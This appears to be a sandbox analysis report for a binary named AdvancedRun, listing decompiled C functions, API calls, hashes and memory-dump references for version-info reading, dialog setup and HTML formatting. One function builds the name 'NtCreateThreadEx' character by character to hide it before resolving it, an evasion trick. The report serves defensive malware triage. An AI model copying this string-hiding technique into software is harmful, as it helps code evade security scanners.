                                                                  0x00408d4e
                                                                  0x00408d54
                                                                  0x00408d5a
                                                                  0x00408d60
                                                                  0x00408d66
                                                                  0x00408d6c
                                                                  0x00408d72
                                                                  0x00408d73
                                                                  0x00408d7f
                                                                  0x00408d85
                                                                  0x00408d8a
                                                                  0x00408d8f
                                                                  0x00408d90
                                                                  0x00408da8
                                                                  0x00408db9
                                                                  0x00408dbf
                                                                  0x00408dc5
                                                                  0x00408dc5
                                                                  0x00000000
                                                                  0x00408cad
                                                                  0x00408ca5
                                                                  0x00408af6
                                                                  0x00408afc
                                                                  0x00408b07
                                                                  0x00408b2a
                                                                  0x00408b38
                                                                  0x00408b53
                                                                  0x00408b56
                                                                  0x00408b62
                                                                  0x00408b6a
                                                                  0x00408b6a
                                                                  0x00408b2a
                                                                  0x00408b07
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                  • {Unknown}, xrefs: 00408BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                  • API String ID: 4111938811-1819279800
                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                  0x0040b04d
                                                                  0x0040b05e
                                                                  0x0040b060
                                                                  0x0040b063
                                                                  0x0040b06a
                                                                  0x0040b06d
                                                                  0x0040b076
                                                                  0x0040b07b
                                                                  0x0040b07e
                                                                  0x0040b084
                                                                  0x0040b08e
                                                                  0x0040b0a8
                                                                  0x0040b0aa
                                                                  0x0040b0ad
                                                                  0x0040b0b0
                                                                  0x0040b0b3
                                                                  0x0040b0b6
                                                                  0x0040b0b8
                                                                  0x0040b0bb
                                                                  0x0040b0be
                                                                  0x0040b0c1
                                                                  0x0040b0c4
                                                                  0x0040b0c7
                                                                  0x0040b0ca
                                                                  0x0040b0cd
                                                                  0x0040b0cd
                                                                  0x0040b0e5
                                                                  0x0040b11f
                                                                  0x0040b128
                                                                  0x0040b0e7
                                                                  0x0040b0e7
                                                                  0x0040b0f1
                                                                  0x0040b0f2
                                                                  0x0040b0f3
                                                                  0x0040b0fb
                                                                  0x0040b0fd
                                                                  0x0040b0fe
                                                                  0x0040b11d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040b11d
                                                                  0x0040b13c
                                                                  0x0040b151
                                                                  0x0040b166
                                                                  0x0040b17b
                                                                  0x0040b190
                                                                  0x0040b1a5
                                                                  0x0040b1ba
                                                                  0x0040b1cf
                                                                  0x0040b1d6
                                                                  0x0040b1d7
                                                                  0x0040b1d8
                                                                  0x0040b1de
                                                                  0x0040b1e3

                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                  • API String ID: 1223191525-1542517562
                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                  0x0040a1f8
                                                                  0x0040a26d
                                                                  0x00000000
                                                                  0x0040a26f
                                                                  0x0040a205
                                                                  0x0040a20b
                                                                  0x0040a20d
                                                                  0x0040a213
                                                                  0x0040a214
                                                                  0x0040a215
                                                                  0x0040a216
                                                                  0x0040a217
                                                                  0x0040a219
                                                                  0x0040a21f
                                                                  0x0040a223
                                                                  0x0040a227
                                                                  0x0040a22b
                                                                  0x0040a22f
                                                                  0x0040a233
                                                                  0x0040a237
                                                                  0x0040a23b
                                                                  0x0040a23f
                                                                  0x0040a243
                                                                  0x0040a247
                                                                  0x0040a24b
                                                                  0x0040a24f
                                                                  0x0040a253
                                                                  0x0040a257
                                                                  0x0040a25b
                                                                  0x0040a25f
                                                                  0x0040a269
                                                                  0x00000000
                                                                  0x0040a26c
                                                                  0x0040a271

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                  • API String ID: 2574300362-1257427173
                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 63%
                                                                  			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                  0x00407f9b
                                                                  0x00407fa3
                                                                  0x00407fad
                                                                  0x00407fb9
                                                                  0x0040802e
                                                                  0x00408032
                                                                  0x00408038
                                                                  0x0040803e
                                                                  0x00407fbb
                                                                  0x00407fc9
                                                                  0x00407fd0
                                                                  0x00407fe0
                                                                  0x00407fe5
                                                                  0x00407ff7
                                                                  0x00408015
                                                                  0x0040801b
                                                                  0x00408021
                                                                  0x00408021
                                                                  0x00408051
                                                                  0x00408051
                                                                  0x00408059
                                                                  0x00408065
                                                                  0x00408069
                                                                  0x0040806f
                                                                  0x00408087
                                                                  0x00408087
                                                                  0x0040809c
                                                                  0x004080bb
                                                                  0x004080d1
                                                                  0x004080de
                                                                  0x004080e2
                                                                  0x004080ea
                                                                  0x004080fb
                                                                  0x00408105
                                                                  0x00408115
                                                                  0x00408121
                                                                  0x00408127
                                                                  0x00408150

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407FD0
                                                                  • memset.MSVCRT ref: 00407FE5
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                  • String ID:
                                                                  • API String ID: 304928396-0
                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                  0x0040ae90
                                                                  0x0040aeab
                                                                  0x0040aeb2
                                                                  0x0040aec0
                                                                  0x0040aec7
                                                                  0x0040aecc
                                                                  0x0040aed3
                                                                  0x0040aeda
                                                                  0x0040aee1
                                                                  0x0040aee1
                                                                  0x0040aee7
                                                                  0x0040aeea
                                                                  0x0040aeed
                                                                  0x0040aef9
                                                                  0x0040aefe
                                                                  0x0040af05
                                                                  0x0040af07
                                                                  0x0040af08
                                                                  0x0040af13
                                                                  0x0040af18
                                                                  0x0040af19
                                                                  0x0040af26
                                                                  0x0040af2b
                                                                  0x0040af2b
                                                                  0x0040af2e
                                                                  0x0040af34
                                                                  0x0040af43
                                                                  0x0040af44
                                                                  0x0040af4f
                                                                  0x0040af54
                                                                  0x0040af55
                                                                  0x0040af62
                                                                  0x0040af67
                                                                  0x0040af70
                                                                  0x0040af76
                                                                  0x0040af7a
                                                                  0x0040af82
                                                                  0x0040af88
                                                                  0x0040af8d
                                                                  0x0040af97
                                                                  0x0040af9f
                                                                  0x0040afa5
                                                                  0x0040afa9
                                                                  0x0040afb1
                                                                  0x0040afb7
                                                                  0x0040afbd

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                  • API String ID: 3143752011-1996832678
                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                  0x00403c09
                                                                  0x00403c0c
                                                                  0x00403c11
                                                                  0x00403c1b
                                                                  0x00403c3f
                                                                  0x00403c4a
                                                                  0x00403c6e
                                                                  0x00403c96
                                                                  0x00403c9a
                                                                  0x00403ca6
                                                                  0x00403cb3
                                                                  0x00403cb8
                                                                  0x00403cc5
                                                                  0x00403cca
                                                                  0x00403cdd
                                                                  0x00403ce6
                                                                  0x00403cf8
                                                                  0x00403d11
                                                                  0x00403d26
                                                                  0x00403d3f
                                                                  0x00403d54
                                                                  0x00403d6d
                                                                  0x00403d76
                                                                  0x00403d88
                                                                  0x00403d9e
                                                                  0x00403db0
                                                                  0x00403db5
                                                                  0x00403dc4
                                                                  0x00403dc8
                                                                  0x00403dc9
                                                                  0x00403dca
                                                                  0x00403dda
                                                                  0x00403ddf
                                                                  0x00403de2
                                                                  0x00403de3
                                                                  0x00403df4
                                                                  0x00403df8
                                                                  0x00403df9
                                                                  0x00403dfa
                                                                  0x00403e0a
                                                                  0x00403e0f
                                                                  0x00403e12
                                                                  0x00403e13
                                                                  0x00403e22
                                                                  0x00403e26
                                                                  0x00403e28
                                                                  0x00403e29
                                                                  0x00403e39
                                                                  0x00403e3e
                                                                  0x00403e41
                                                                  0x00403e42
                                                                  0x00403e51
                                                                  0x00403e55
                                                                  0x00403e57
                                                                  0x00403e58
                                                                  0x00403e68
                                                                  0x00403e6d
                                                                  0x00403e70
                                                                  0x00403e71
                                                                  0x00403e71
                                                                  0x00403e87
                                                                  0x00403e8d
                                                                  0x00403e9e
                                                                  0x00403ea6
                                                                  0x00403eaf
                                                                  0x00403ebc

                                                                  APIs
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
